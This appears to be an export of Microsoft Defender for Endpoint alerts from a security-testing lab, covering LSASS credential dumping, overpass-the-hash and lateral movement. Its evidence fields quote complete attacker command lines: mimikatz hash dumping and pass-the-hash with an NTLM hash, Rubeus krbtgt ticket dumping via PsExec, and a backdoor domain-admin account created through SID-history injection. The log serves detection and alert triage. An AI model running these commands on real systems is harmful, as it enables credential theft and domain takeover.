"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-11T08:17:34.3184356Z",
"processId": 3844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:19:39.07Z",
"fileName": "services.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:13:27.7352205Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 568,
"processCommandLine": "services.exe",
"processCreationTime": "2022-11-11T08:13:27.8223756Z",
"processId": 632,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "d7a213f3cfee2a8a191769eb33847953be51de54",
"sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963593489455_-1122334665
|
c499c60d-d12f-4c46-8b3f-efeb93bb9209
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:59:19.3489647Z
|
2022-12-22T08:59:20.0333333Z
| null |
2022-12-22T08:47:50.7095101Z
|
2022-12-22T08:47:50.7095101Z
|
Password hashes dumped from LSASS memory
|
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
|
CredentialAccess
|
New
|
Medium
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
2ed33edd-2c33-49fd-877b-ab73fba14d59
| null | null | null |
[
"T1003",
"T1003.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:19.3833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:59:19.3833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-12-22T08:47:23.3350389Z",
"processId": 7772,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:59:19.3833333Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:22:31.0581711Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 568,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-12-22T08:22:31.2215121Z",
"processId": 720,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:46.34Z
|
Suspicious
|
None
|
jeff
|
internal.corp
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:16:02.3033333Z
|
Suspicious
|
None
|
ronhd
|
vpn.zone
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045938683943421_1830318078
|
da638045938683943421_1830318078
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:17:48.3944641Z
|
2022-11-21T02:19:23.2233333Z
| null |
2022-11-21T02:01:39.5403186Z
|
2022-11-21T02:05:26.7380973Z
|
Command line used for possible overpass-the-hash
|
A suspicious command line might have been used to perform an overpass-the-hash attack. This attack typically involves obtaining a password hash from memory and then using the ticket to authenticate.
|
LateralMovement
|
New
|
Medium
| null |
UnsupportedAlertType
| null | null |
MTP
|
79ae2f5c-7394-4224-bae2-18fa2c975eec
| null | null | null |
[
"T1550.002",
"T1550.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.44Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:05:25.5028748Z",
"processId": 6412,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.44Z",
"fileName": "powershell.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt",
"processCreationTime": "2022-11-21T02:05:25.6506882Z",
"processId": 4264,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:17:48.44Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.55Z",
"fileName": "powershell.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:06:11.4925045Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 372,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.6266667Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-21T02:05:25.1740087Z",
"processId": 772,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.6966667Z",
"fileName": "powershell.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:06:11.4925045Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 372,
"processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1",
"processCreationTime": "2022-11-21T02:01:44.3957302Z",
"processId": 11616,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.6966667Z",
"fileName": "xcopy.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"xcopy.exe\" \\\\msdxv2-win10b\\C$\\Temp\\AdminTicket.txt C:\\M365DAttack\\Admin-Tickets",
"processCreationTime": "2022-11-21T02:02:28.1136285Z",
"processId": 10944,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.7733333Z",
"fileName": "PsExec.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"",
"processCreationTime": "2022-11-21T02:02:06.6655672Z",
"processId": 10844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.9366667Z",
"fileName": "PsExec.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:02:27.6005533Z",
"processId": 9792,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.9933333Z",
"fileName": "xcopy.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:01:44.9851491Z",
"processId": 10640,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:49.0666667Z",
"fileName": "PsExec.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"",
"processCreationTime": "2022-11-21T02:01:45.0913234Z",
"processId": 11072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:49.1266667Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:01:38.4465922Z",
"processId": 3516,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:49.1266667Z",
"fileName": "powershell.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt",
"processCreationTime": "2022-11-21T02:01:38.5793699Z",
"processId": 8160,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:49.5566667Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-21T02:01:38.0862456Z",
"processId": 10732,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:51.1433333Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:01:44.2419747Z",
"processId": 7452,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T13:47:35.73Z
|
Unknown
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-11T08:20:15.65Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 816
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
|
2022-11-11T08:17:06.6760783Z
| 4,704
|
2022-11-11T08:16:44.2952776Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
da638001152939168563_698159054
|
31a1eafe-d717-4b3b-8397-db1503fd95cb
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:53.9168734Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:12:39.7705491Z
|
2022-09-30T06:12:39.7705491Z
|
LSASS process memory modified
|
The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
eb025de4-0ad4-4fcb-8ce2-711ee3956107
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1003.001",
"T1547.005"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:53.9566667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:53.9566667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-09-30T06:11:53.2107428Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:54.3566667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
